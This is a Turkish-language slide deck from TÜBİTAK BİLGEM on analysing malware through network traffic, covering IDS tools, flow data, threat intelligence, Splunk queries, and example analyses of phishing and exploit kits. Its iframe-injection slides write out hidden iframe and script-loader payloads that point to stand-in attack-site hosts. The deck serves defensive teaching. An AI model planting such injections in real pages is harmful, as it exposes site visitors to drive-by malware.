Ağ Üzerinde Zararlı Yazılım Analizi TÜBİTAK BİLGEM Siber Güvenlik Enstitüsü 13 Ocak 2016
Ağ Üzerinde Zararlı Yazılım Analizi Tanım Bilgisayar ağlarının herhangi saldırı ve zararlı faaliyete karşın izlenmesi ve analiz edilmesi Amaç Şüpheli bağlantı ve zararlı yazılım tespiti Saldırı kaynaklarını araştırma Yöntem Kurum içine ve dışarı yapılan ağ bağlantıların sistematik olarak incelenmesi Kaynaklar Kaydedilmiş Ağ Trafiği (PCAP) Saldırı Tespit Sistemi Kayıtları İçerik Filtreleyici Kayıtları Güvenlik Duvarı Kayıtları Ağ Akış Bilgisi Kayıtları 2
Ağ Analizi Metodoloji Bilgi Edinme Olay ne zaman ve nasıl gerçekleşti? Ortam ve organizasyon hakkında bilinmesi gerekenler Strateji Önceliklendirme Delil Toplama Not Tutma Delil Muhafaza Etme Analiz İlişkilendirme Zaman Tüneli Ek delil toplama Raporlama Dökümantasyon 3
Ağ Analizi Delil Toplama Kanıt Elde etme Saklama Sağlayacağı bilgiler Analiz etmek için kullanılacak araçlar Tipik kullanım PCAP Ağ üzerindeki makinalar, tap cihazları ve ağ üzerindeki bitleri okuyabilecek her hangi bir alet Çok fazla saklama alanı işgal eder. Saklama cihazları için ek maliyet harcamanız gerekebilir. Ağ üzerinden geçen verinin tamamına erişebilirsiniz. Wireshark, güvenlik duvarı, içerik analiz araçları vb. Derinlemesine incelemelerde, saldırganın gerçekleştirdiği atakların tespitinde kullanılır. Ağ akışı Uygulamalar ve flow çıkaran araçlar (anahtarlama ve yönledirici cihazlar) Az miktarda saklama gereksinimi duyar. Büyük ağ paketlerini özetler. Bağlantılar, gönderilen veri miktarı, zaman, vb hakkında özet bilgiler sunar. Silk, Argus, vb. Saldırganın ve ele geçirilen sistemlerin tespitinde kullanılır. Olay kayıtları /Uyarılar Olay kayıtı üretebilecek her uygulamadan ya da bu uygulamaların gönderdiği olay kayıt sistemleri Genellikle olay kayıt yapan cihazlar üzerinde bulunabilir. Bununla birlikle merkezi olay kayıt yönetim sistemlerince saklanır. Belirlenen kriter haricindeki bir güvenlik olayı hakkında bilgi sunar. Splunk, Arcsight, SIEM s Yüksek öncelikli olaylar hakkında uyarılarda bulunur ve saldırganın, ele geçirilen sistemlerin tespitinde kullanılır. 4
Ağ Analizi - Zorluklar - 4V Volume Büyük Ağ Verisi (GB s) Variety Farklı Protokoller Velocity Yüksek Veri Akışı Variability Geçici, uçucu bilgiler 5
Ağ Analizi Genel Yaklaşımı Olay ne zaman, nasıl ve nerede gerçekleşti? İlişkilendirme Zaman Tüneli Olayın kaynağı kim? Önceliklendirme 6
Analiz Aşamaları Trafik kaydetme ve filtreleme Trafiği STS den geçirme Trafik filtreleme Metadata, Flow, PCAP analizi Antivirüs taraması Trafikten şüpheli uzantılı (.exe,.js,.zip,.rar vb.) dosyaların çıkarılması Antivirüs sisteminde dosya taratılması Bilgisayar Analizi Paylaşımı Ağ trafiğinden elde edilen bulguların bilgisayar analizi için paylaşılması 1 2 3 4 5 Tehdit istihbaratı IP / alan adı kara listeleri İstatistiksel korelasyon ve tablolar Bağlantıların IP kara listeleriyle karşılaştırılması Tehdit istihbaratı (IOC) servis kontrolü İstatistikler, tablolar ve korelasyon analizleri Snorby Nfsen Splunk 7
Saldırı Tespit/Engelleme Sistemleri STS özellikleri Bileşim sistemlerine sızma denemeleri Ağdaki sistemlere zarar verecek her tür saldırılar DDOS Yetkisiz erişim Yazılım ya da donanımsal çözümler olarak sunulmaktadır. İmza tabanlı çalışır. Kural setleri mevcuttur. Suricata IDS Yüksek performanslı çalışabilme Gigabitler seviyesinde ağ trafiğini işleyebilmesi HTTP isteklerini, TLS el sıkışmalarını, SSH bağlantılarını kaydedebilme Trafikten dosya ayıklama Endüstri standartlarınca belirlenen formatlarda çıktı üretebilme (Unified2 vb.), Gelişmiş kural setine sahip olması (ET-ET Pro) IP itibar (reputation) desteğinin olması 8
Saldırı Tespit/Engelleme Sistemleri Bro IDS - Ağ Analiz Framework Bro açık kaynak; Ağ programlama betik diline sahip, Tüm HTTP trafiğini (sunucu/istemci istek ve cevapları, mime türleri, uri vb.), DNS istek ve cevaplarını, SSL sertifikalarını, SMTP oturumlarını, FTP trafiğini çözümleyerek kaydedebilmektedir. Ayrıca ağ akışını da kayıt altına almaktadır. Snort IDS Sourcefire tarafından geliştirilen açık kaynak kodlu bir saldırı tespit ve önleme sistemi Dünya genelinde en çok kullanılan saldırı tespit sistemlerden biri, Linux ve FreeBSD Snort Modları Sniffer Packet logger 9
IDS Sistemleri Eksiklikleri Özellikle exploit tabanlı imzaların doğruluk problemleri Bilinmeyen anomali (0-day) ve sızmalara karşı etkisiz kalması Adli analiz veya saldırı analizi için kaliteli bilgi sağlamaması Saldırı kapsamı / Hedef / Strateji, saldırı ( botnet ) boyutu vb. Kasıt olmayan anomalilerle kötü niyetli olayları ayırt edememesi Sistemsel arıza ve problemler 10
Ağ Paketi Yakalama/Analizi Tcpdump Wireshark Unix/Linux sistem üzerinde ön tanımlı Komut satırı paket analiz aracı ve dinleyicisi Arayüze sahip paket analiz aracı Standart paket dinleme aracı Windows & Linux tshark Microsoft Message Analyzer Komut satırı paket analiz aracı ve dinleyicisi Wireshark ile beraber sisteme kurulmaktadır. Windows tarafından geliştirilmektedir. Process tabanlı ağ trafiği incelemeye olanak sağlar. 11
Ağ Analizi Ağ Akış Bilgisi (Flow Data) Ağ Akışı (Flow Data) Kaynak sistemden hedefe gönderilen paketlerin veri içeren kısımları işlenmeden özet bilgi sunar. o o o o o o o Kaynak IP Hedef IP Kaynak port o [TCP, UDP veya 0 (TCP ya da UDP trafiği değilse)] Hedef port IP protokolü Ağ akışı boyutu ve paket sayısı IP servis tipi Ağ Akış Protokolleri NetFlow (Cisco) sflow (HP) IPFIX (Herhangi bir üretici firmaya özel bir protokol değildir.) 12
Ağ Analizi Ağ Akış Bilgisi (Flow Data) Netflow Cisco tarafından geliştirilmiş bir ağ akış protokolü Cisco IOS haricinde, Linux, BSD ve Solaris platformlarında da desteklendiği için bir standart halini almıştır. Ağ akışı 7 temel değerden oluşur. sflow HP marka cihazlar tarafından kullanılan ağ akış protokolü IPFIX IP Flow Information Export, herhangi bir üretici firmaya özel bir protokol değildir. Netflow v9 ile büyük oranda benzerlik gösterir. Aslında Netflow protokolünün farklı türde cihazların kullanılabilmesi için esnetilmiş hali denebilir. IPFIX protokolü Juniper, Nortel, SonicWALL, Extreme, NTOP, Plixer gibi ürünler tarafından desteklenmektedir. 13
Ağ Akışı (Flow) Analizi Araçları Ağ Akışı (Flow Data) Nfsen Kaynak sistemden hedefe gönderilen paketlerin veri içeren kısımları işlenmeden özet bilgi sunar. Ağ Akış Protokolleri NetFlow (Cisco) sflow (HP) Ağ akışı verileri bir web arayüzü ile görüntülenebilmektedir. IPFIX (Herhangi bir üretici firmaya özel bir protokol değildir.) FLOWBAT Silk Flow Basic Analysis Tool Ağ akışı görselleştirme, analiz, sorgulama, korelasyon aracı CERT NetSA (CERT Network Situational Awareness Team) tarafından geliştirilmiş ağ akış bilgisinin toplanmasını ve işlenmesini sağlayan bir yazılımdır. 14
Tehdit İstihbaratı IP / Alan Adı Kara Listeleri IP Adresi / Alan adı Karalisteleri Gerçek zamanlı IP adresi / alan adı tehdit bilgisi Otomatik olarak üretilme - genelde günlük Çeşitli kaynaklar tarafından oluşturulma - organizasyonlardan özel şirketlere Farklı durumlar için faydalı: İP skorlama, sınıflandırma Enfekte olmuş sistemlerin tespiti Yüksek riskli bağlantılar için uyarı 15
Antivirüs Taraması Dosya Çıkarımı Trafikten şüpheli uzantılı (.exe,.js,.zip,.rar vb.) dosyaların çıkarılması Antivirüs Taraması VirüsMü merkezi çoklu antivirus sisteminde tarama TÜBİTAK Siber Güvenlik Enstitüsü tarafından geliştirilen sistemde 20 farklı antivirüs aracıyla otomatik olarak taratılmaktadır. VirusTotal 16
Veri Toplama-Analiz-Görselleştirme Farklı kaynaklardan gelen verileri ilişkilendirmek Olay ile tespiti arasındaki süreyi kısaltmak Genel eğilimler ve anormaliklerin tespiti SONUÇ : Büyük veriden anlamlı sonuçlar çıkarmak 17
Veri Toplama-Analiz-Görselleştirme Araçları Yaklaşım Veriyi Tanımla Ne verisi? Hangi bilgileri içeriyor? Veriyi Dönüştür Alan oluşturma Filtreleme Sorgulama Sınıflandırma Veriyi Görüntüle Çizelgeler Tablolar Grafikler İstatikler Raporlar 18
Veri Toplama-Analiz-Görselleştirme Araçları ELK (Elastic Search Logstash - Kibana) Splunk Büyük verilerinin indekleslenmesi, analiz edilmesi ve görüntülenmesi Özellikle güçlü sorgulamaya yeteneğine sahip Snorby Alarmların gelişmiş arayüzden görüntülenmesi Moloch OSSEC HIDS OSSIM SIEM Web arayüzü vasıtasıyla filtreleme ve sorgulama 19
Sorgular source="/home/hasan/desktop/data/http.log" iplocation DestinationIP lookup threatscore clientip as DestinationIP search threatscore="1" timechart span=1h count --- count the number of events pr hour timechart avg(delay) by host --calculate the average delay and track each host seperately timechart avg(delay) min(delay) max(delay) --- calculate the average, minimum, and maximum delays per auto-bucket top limit=50 users top major_version, minor_version ---list the top 10 combiantions of major and minor versions top sourceby host --- list the top sources grouped by most fequently host ctable DestinationIP --bütün threatscore değerlerine göre tablo oluşturur. source="/usr/local/bro/logs/current/dns.log" streamstats current=f last(_time) as next_time by Query eval gap = next_time - _time stats count avg(gap) var(gap) by Query sourcetype=dns eval Length=len(Query) stats count(clientip) by Length sort - Length source="/usr/local/bro/logs/dns_filtered.log" iplocation QueryIP streamstats current=f last(_time) as next_time by Query eval gap = next_time - _time stats count avg(gap) var(gap) by Query sort + var(gap) 20
İstatistiksel ve Görsel Analizler 21
Örnek Analizler
1 - Oltalama Saldırısı Ağ Analizi 23
Zararlı Bağlantı Kurulması 24
Exploit Aşaması 25
Zararlı Yazılımın Yüklenmesi 26
2 - Exploit Kit Yükleme ve Ağ Analizi Sayfa ziyaret edilir. Flash Player, Java ya da Silverlight benzeri uygulamalar ile exploit çalışır. Exploit çalışınca zararlı yazılım sisteme yüklenir 27
IDS Alarm Oluşması 28
DHCP ve NBNS protokolü ile istemci tespiti 29
Web tarayıcıdan kurulan bağlantılar HTTP istekleri ile Web tarayıcıdan yapılan istekler incelendiğinde zararlı alan adlarına yapılan bağlantılar görülmektedir. 30
Exploit Aşaması 31
Exploit Aşaması 32
Trafik Bulanıklaştırma (Obfuscation) 33
3 - iframe Enjeksiyonları Analizi iframe asıl HTML sayfası içerisinde bulunan ve kaynağını, yani içeriğini asıl sayfa dışında başka bir siteden alan çerçevelerdir. iframe <iframe> </iframe> tagları ile belirtilir ve kapatılması zorunludur. Bir saldırı sitesine iframe yerleştirme : <iframe frameborder="0" height="0" src="http://<saldırı-sitesi>/path/file" style="display:none" width="0"></iframe> 34
iframe Enjeksiyon Örneği 35
Farklı Enjeksiyonlar Bir saldırı sitesinden komut dosyası çağıran veya çalıştıran JavaScript veya başka bir kodlama dili: <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script> Tarayıcıyı bir saldırı sitesine yönlendiren komut dosyaları <script> if (document.referrer.match(/google\.com/)) { window.location("http://malware-attack-site/"); } </script> iframe kodunu bulmak için [iframe] gibi kelimeleri aramak da yardımcı olabilir. Örneğin, Unix tabanlı sistemlerde: $ grep -irn "iframe"./ less 36
PNG Dosyası içine iframe Enjeksiyonu 37
Sonuç - Bulguların Paylaşımı Ağ Analizi Bilgisayar ve Zararlı Yazılım Analizi 38
Teşekkürler